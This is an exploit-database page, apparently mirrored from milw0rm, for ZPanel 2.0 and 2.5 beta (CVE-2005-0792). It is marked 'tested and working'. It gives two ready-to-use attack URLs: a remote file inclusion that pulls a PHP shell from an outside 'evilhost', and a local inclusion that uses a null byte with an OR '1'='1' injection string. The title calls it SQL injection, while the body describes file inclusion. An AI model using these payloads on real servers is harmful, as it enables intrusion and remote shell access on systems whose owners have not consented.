[] NeoSense
E X P L O I T S
title author type platform port cve id

ZPanel 2.5 - SQL Injection

Author: Mikhail
type: webapps
platform: php
port: 
date_added: 2005-03-14 
date_updated:  
verified: 1 
codes: OSVDB-14803;CVE-2005-0792 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Tested and working /str0ke

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.